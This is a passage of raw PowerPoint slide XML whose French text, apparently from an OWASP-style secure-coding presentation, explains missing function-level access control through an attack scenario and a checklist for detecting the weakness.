              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permettre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’autres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non protégées.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paramètre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “action”  pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spécifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invoquer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>différentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> actions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requièrent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilèges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>différents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérabilité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>existe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilèges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifiés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3657600"/>
            <a:ext cx="3383280" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meilleure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>façon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de tester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chacune</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>applicatives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permet-elle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naviguer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fonctionnalités</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restreint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certaines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>côté</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont-elles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manquantes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont-elles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>réalisées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s’appuyant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seulement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fournies</a:t>
            </a:r>
            <a:r>
